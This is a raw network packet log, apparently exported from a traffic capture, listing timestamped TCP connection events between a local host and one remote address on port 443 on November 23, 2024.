                                                                                                                                                                                  Nov 23, 2024 14:47:31.773391962 CET4434987013.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:31.773956060 CET49870443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:47:31.773972034 CET4434987013.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:31.774380922 CET49870443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:47:31.774384975 CET4434987013.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:31.789541960 CET4434987213.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:31.789870024 CET49872443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:47:31.789887905 CET4434987213.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:31.790262938 CET49872443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:47:31.790271044 CET4434987213.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:31.818860054 CET4434987113.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:31.819298983 CET49871443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:47:31.819339991 CET4434987113.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:31.819675922 CET49871443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:47:31.819686890 CET4434987113.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:31.835267067 CET4434986813.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:31.835386038 CET4434986813.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:31.835434914 CET49868443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:47:31.835747004 CET49868443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:47:31.835760117 CET4434986813.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:31.835799932 CET49868443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:47:31.835805893 CET4434986813.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:31.838864088 CET49873443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:47:31.838898897 CET4434987313.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:31.839004993 CET49873443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:47:31.839135885 CET49873443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:47:31.839148998 CET4434987313.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:32.046966076 CET4434986913.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:32.047029972 CET4434986913.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:32.047086954 CET49869443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:47:32.047337055 CET49869443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:47:32.047346115 CET4434986913.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:32.047360897 CET49869443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:47:32.047365904 CET4434986913.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:32.050476074 CET49874443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:47:32.050489902 CET4434987413.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:32.050574064 CET49874443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:47:32.050754070 CET49874443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:47:32.050769091 CET4434987413.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:32.234436989 CET4434987213.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:32.234525919 CET4434987213.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:32.234570026 CET49872443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:47:32.234775066 CET49872443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:47:32.234786987 CET4434987213.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:32.234803915 CET49872443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:47:32.234810114 CET4434987213.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:32.236660004 CET4434987013.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:32.236753941 CET4434987013.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:32.236804962 CET49870443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:47:32.237673998 CET49875443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:47:32.237706900 CET4434987513.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:32.237776995 CET49875443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:47:32.237850904 CET49870443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:47:32.237859011 CET4434987013.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:32.237883091 CET49870443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:47:32.237886906 CET4434987013.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:32.238862038 CET49875443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:47:32.238873005 CET4434987513.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:32.240057945 CET49876443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:47:32.240097046 CET4434987613.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:32.240158081 CET49876443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:47:32.240281105 CET49876443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:47:32.240295887 CET4434987613.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:32.271528959 CET4434987113.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:32.271603107 CET4434987113.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:32.271667004 CET49871443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:47:32.271878958 CET49871443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:47:32.271898985 CET4434987113.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:32.271913052 CET49871443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:47:32.271920919 CET4434987113.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:32.277345896 CET49877443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:47:32.277383089 CET4434987713.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:32.277472973 CET49877443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:47:32.277770996 CET49877443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:47:32.277781010 CET4434987713.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:33.628658056 CET4434987313.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:33.629331112 CET49873443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:47:33.629348993 CET4434987313.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:33.630111933 CET49873443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:47:33.630117893 CET4434987313.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:33.829600096 CET4434987413.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:33.830465078 CET49874443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:47:33.830506086 CET4434987413.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:33.830842018 CET49874443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:47:33.830856085 CET4434987413.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:33.965986967 CET4434987613.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:33.966582060 CET49876443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:47:33.966623068 CET4434987613.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:33.966984034 CET49876443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:47:33.966991901 CET4434987613.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:33.996085882 CET4434987713.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:34.006103039 CET49877443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:47:34.006136894 CET4434987713.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:34.006566048 CET49877443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:47:34.006572008 CET4434987713.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:34.075081110 CET4434987313.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:34.075237036 CET4434987313.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:34.075340986 CET49873443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:47:34.075552940 CET49873443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:47:34.075553894 CET49873443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:47:34.075577021 CET4434987313.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:34.075586081 CET4434987313.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:34.078917980 CET49878443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:47:34.078950882 CET4434987813.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:34.079044104 CET49878443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:47:34.079273939 CET49878443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:47:34.079288960 CET4434987813.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:34.083261013 CET4434987513.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:34.083729982 CET49875443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:47:34.083748102 CET4434987513.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:34.084151030 CET49875443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:47:34.084155083 CET4434987513.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:34.317409039 CET4434987413.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:34.317476034 CET4434987413.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:34.317559958 CET49874443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:47:34.323283911 CET49874443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:47:34.323307991 CET4434987413.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:34.323340893 CET49874443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:47:34.323348999 CET4434987413.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:34.343523979 CET49879443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:47:34.343569994 CET4434987913.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:34.343652964 CET49879443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:47:34.343771935 CET49879443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:47:34.343781948 CET4434987913.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:34.402856112 CET4434987613.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:34.402936935 CET4434987613.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:34.403042078 CET49876443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:47:34.403284073 CET49876443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:47:34.403307915 CET4434987613.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:34.403337955 CET49876443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:47:34.403346062 CET4434987613.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:34.406090021 CET49880443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:47:34.406105995 CET4434988013.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:34.406166077 CET49880443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:47:34.406296968 CET49880443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:47:34.406308889 CET4434988013.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:34.431801081 CET4434987713.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:34.431865931 CET4434987713.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:34.431982994 CET49877443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:47:34.432205915 CET49877443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:47:34.432219028 CET4434987713.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:34.432228088 CET49877443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:47:34.432233095 CET4434987713.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:34.435946941 CET49881443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:47:34.435987949 CET4434988113.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:34.436059952 CET49881443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:47:34.436188936 CET49881443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:47:34.436199903 CET4434988113.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:34.535695076 CET4434987513.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:34.535757065 CET4434987513.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:34.535846949 CET49875443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:47:34.536026955 CET49875443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:47:34.536026955 CET49875443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:47:34.536043882 CET4434987513.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:34.536053896 CET4434987513.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:34.538871050 CET49882443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:47:34.538969040 CET4434988213.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:34.539351940 CET49882443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:47:34.539470911 CET49882443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:47:34.539514065 CET4434988213.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:35.818638086 CET4434987813.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:35.819346905 CET49878443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:47:35.819367886 CET4434987813.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:35.819834948 CET49878443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:47:35.819839954 CET4434987813.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:36.128657103 CET4434987913.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:36.133095026 CET4434988113.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:36.157197952 CET49879443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:47:36.157236099 CET4434987913.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:36.158833027 CET49879443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:47:36.158849001 CET4434987913.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:36.159121990 CET49881443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:47:36.159161091 CET4434988113.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:36.159535885 CET49881443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:47:36.159548044 CET4434988113.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:36.218708992 CET4434988013.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:36.222157001 CET49880443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:47:36.222210884 CET4434988013.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:36.222867966 CET49880443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:47:36.222881079 CET4434988013.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:36.255764961 CET4434987813.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:36.255959988 CET4434987813.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:36.256016970 CET49878443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:47:36.256103992 CET49878443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:47:36.256122112 CET4434987813.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:36.256130934 CET49878443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:47:36.256135941 CET4434987813.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:36.259052992 CET49883443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:47:36.259109974 CET4434988313.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:36.259172916 CET49883443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:47:36.259363890 CET49883443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:47:36.259378910 CET4434988313.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:36.356389999 CET4434988213.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:36.356972933 CET49882443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:47:36.357054949 CET4434988213.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:36.358047009 CET49882443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:47:36.358062029 CET4434988213.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:36.573540926 CET4434987913.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:36.573720932 CET4434987913.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:36.573784113 CET49879443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:47:36.573851109 CET49879443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:47:36.573868990 CET4434987913.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:36.573879004 CET49879443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:47:36.573884964 CET4434987913.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:36.577059031 CET49884443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:47:36.577112913 CET4434988413.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:36.577193975 CET49884443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:47:36.577353954 CET49884443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:47:36.577370882 CET4434988413.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:36.586863041 CET4434988113.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:36.586920023 CET4434988113.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:36.586967945 CET49881443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:47:36.587129116 CET49881443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:47:36.587142944 CET4434988113.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:36.587152958 CET49881443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:47:36.587157965 CET4434988113.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:36.589612961 CET49885443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:47:36.589654922 CET4434988513.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:36.589724064 CET49885443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:47:36.589864016 CET49885443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:47:36.589881897 CET4434988513.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:36.661561012 CET4434988013.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:36.661741018 CET4434988013.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:36.661832094 CET49880443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:47:36.662162066 CET49880443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:47:36.662163019 CET49880443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:47:36.662233114 CET4434988013.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:36.662271976 CET4434988013.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:36.665150881 CET49886443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:47:36.665170908 CET4434988613.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:36.665250063 CET49886443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:47:36.665396929 CET49886443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:47:36.665409088 CET4434988613.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:36.805027962 CET4434988213.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:36.805099964 CET4434988213.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:36.805150986 CET49882443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:47:36.805366993 CET49882443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:47:36.805392981 CET4434988213.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:36.805411100 CET49882443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:47:36.805418968 CET4434988213.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:36.809308052 CET49887443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:47:36.809357882 CET4434988713.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:36.809417009 CET49887443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:47:36.809561014 CET49887443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:47:36.809581041 CET4434988713.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:38.052637100 CET4434988313.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:38.053374052 CET49883443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:47:38.053392887 CET4434988313.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:38.053847075 CET49883443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:47:38.053852081 CET4434988313.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:38.423383951 CET4434988413.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:38.424062014 CET49884443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:47:38.424113989 CET4434988413.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:38.424525023 CET49884443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:47:38.424531937 CET4434988413.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:38.440589905 CET4434988513.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:38.457526922 CET4434988613.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:38.485636950 CET49885443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:47:38.485670090 CET4434988513.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:38.492189884 CET49885443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:47:38.492207050 CET4434988513.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:38.492928982 CET49886443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:47:38.492952108 CET4434988613.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:38.493320942 CET49886443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:47:38.493325949 CET4434988613.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:38.505486965 CET4434988313.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:38.505510092 CET4434988313.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:38.505574942 CET4434988313.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:38.505592108 CET49883443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:47:38.505630970 CET49883443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:47:38.505847931 CET49883443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:47:38.505861998 CET4434988313.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:38.505873919 CET49883443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:47:38.505878925 CET4434988313.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:38.532862902 CET49888443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:47:38.532908916 CET4434988813.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:38.532964945 CET49888443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:47:38.533298016 CET49888443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:47:38.533319950 CET4434988813.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:38.603667974 CET4434988713.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:38.606748104 CET49887443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:47:38.606770039 CET4434988713.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:38.613795042 CET49887443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:47:38.613805056 CET4434988713.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:38.878894091 CET4434988413.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:38.878963947 CET4434988413.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:38.879004955 CET49884443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:47:38.879439116 CET49884443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:47:38.879446983 CET4434988413.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:38.879462004 CET49884443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:47:38.879467010 CET4434988413.107.246.63192.168.2.4
